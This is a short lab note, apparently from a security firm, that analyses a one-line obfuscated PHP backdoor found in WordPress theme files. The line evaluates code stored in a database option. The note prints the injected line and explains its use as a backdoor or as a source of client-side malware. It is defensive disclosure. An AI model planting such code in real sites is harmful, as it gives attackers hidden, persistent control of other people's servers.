Minimalistic WordPress injection

Labs Note

WordPress-specific malware is slightly different than generic PHP malware. Inside WordPress files, it can use WordPress API and WordPress database. This allows to create this kind of injections:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the “render” (deobfuscated) option from the WordPress wp_options table, which it extracts using the get_option WordPress API function

This piece of code can be used both as a backdoor (say to execute arbitrary code passed in a certain request parameter), or to inject a client-side malware (it was found right after the tag in theme files). We actually found the “render” option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can\’t tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at

You May Also Like